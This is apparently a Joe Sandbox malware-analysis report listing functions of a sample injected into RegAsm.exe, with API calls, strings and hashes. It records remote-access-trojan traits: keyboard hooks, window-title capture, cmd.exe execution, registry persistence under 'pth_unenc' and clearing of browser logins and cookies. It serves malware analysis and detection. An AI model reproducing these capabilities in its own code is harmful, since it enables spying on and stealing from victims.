                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Exception@8Throw
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 2005118841-1866435925
                                                          • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                          • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                                          • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                                                          • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                                          Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                                                          • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F823,pth_unenc,004752D8), ref: 0041384D
                                                          • RegCloseKey.ADVAPI32(004752D8,?,0040F823,pth_unenc,004752D8), ref: 00413858
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
                                                          • API String ID: 1818849710-4028850238
                                                          • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                          • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                          • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                          • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                          Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                            • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                            • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                          • String ID: bad locale name
                                                          • API String ID: 3628047217-1405518554
                                                          • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                          • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                          • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                          • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                          Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                          • ShowWindow.USER32(00000009), ref: 00416C61
                                                          • SetForegroundWindow.USER32 ref: 00416C6D
                                                            • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                                            • Part of subcall function 0041CD9B: GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                            • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                            • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                          • String ID: !D@
                                                          • API String ID: 186401046-604454484
                                                          • Opcode ID: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                          • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                          • Opcode Fuzzy Hash: 9f7fe5989ead697ba6d36c86eae2c50fc2179958361be672788b949ad241deb2
                                                          • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                          Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: /C $cmd.exe$open
                                                          • API String ID: 587946157-3896048727
                                                          • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                          • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                          • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                          • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                          Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                          • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                          • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: TerminateThread$HookUnhookWindows
                                                          • String ID: pth_unenc
                                                          • API String ID: 3123878439-4028850238
                                                          • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                          • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                          • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                          • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                          Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: GetCursorInfo$User32.dll
                                                          • API String ID: 1646373207-2714051624
                                                          • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                          • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                                          • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                                          • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                                          Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetLastInputInfo$User32.dll
                                                          • API String ID: 2574300362-1519888992
                                                          • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                          • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                                          • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                                          • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                                          Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                          • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                          • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                                          • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                          Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                          • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                                          • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                                          • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                                          Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                          • __freea.LIBCMT ref: 100087D5
                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                          • String ID:
                                                          • API String ID: 2652629310-0
                                                          • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                          • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                          • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                          • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                          Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                                          • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                          • API String ID: 3472027048-1236744412
                                                          • Opcode ID: a2f891f9d224728c04bbb1debadef956fab89d0381d541b8d2862f798e9015da
                                                          • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                                          • Opcode Fuzzy Hash: a2f891f9d224728c04bbb1debadef956fab89d0381d541b8d2862f798e9015da
                                                          • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                                          Function 004194C4 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
                                                          • EnumDisplayDevicesW.USER32(?), ref: 00419525
                                                          • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
                                                          • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DisplayEnum$Devices$Monitors
                                                          • String ID:
                                                          • API String ID: 1432082543-0
                                                          • Opcode ID: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                                                          • Instruction ID: 9f89b1fc864c89aa53311e19646eec67f909338e1adf78e73a6452d568b12732
                                                          • Opcode Fuzzy Hash: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
                                                          • Instruction Fuzzy Hash: 6F218072108314ABD221DF26DC49EABBBECEBD1764F00053FF459D3190EB749A49C66A
                                                          Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                                            • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                                            • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                                          • Sleep.KERNEL32(000001F4), ref: 0040A573
                                                          • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$ForegroundLength
                                                          • String ID: [ $ ]
                                                          • API String ID: 3309952895-93608704
                                                          • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                                          • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                                          • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                                          • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                                          Function 0041B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SystemTimes$Sleep__aulldiv
                                                          • String ID:
                                                          • API String ID: 188215759-0
                                                          • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                          • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                                          • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                                          • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                                          Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                          • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                                          • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                          • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                                          Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                          • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                                          • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                                          • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                                          Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                          • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                          • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                          • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                          • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                          Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                          • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                          • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                          • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                          Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                                            • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                                          • _UnwindNestedFrames.LIBCMT ref: 00439891
                                                          • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                                          • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                          • String ID:
                                                          • API String ID: 2633735394-0
                                                          • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                          • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                                          • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                                          • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                                          Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
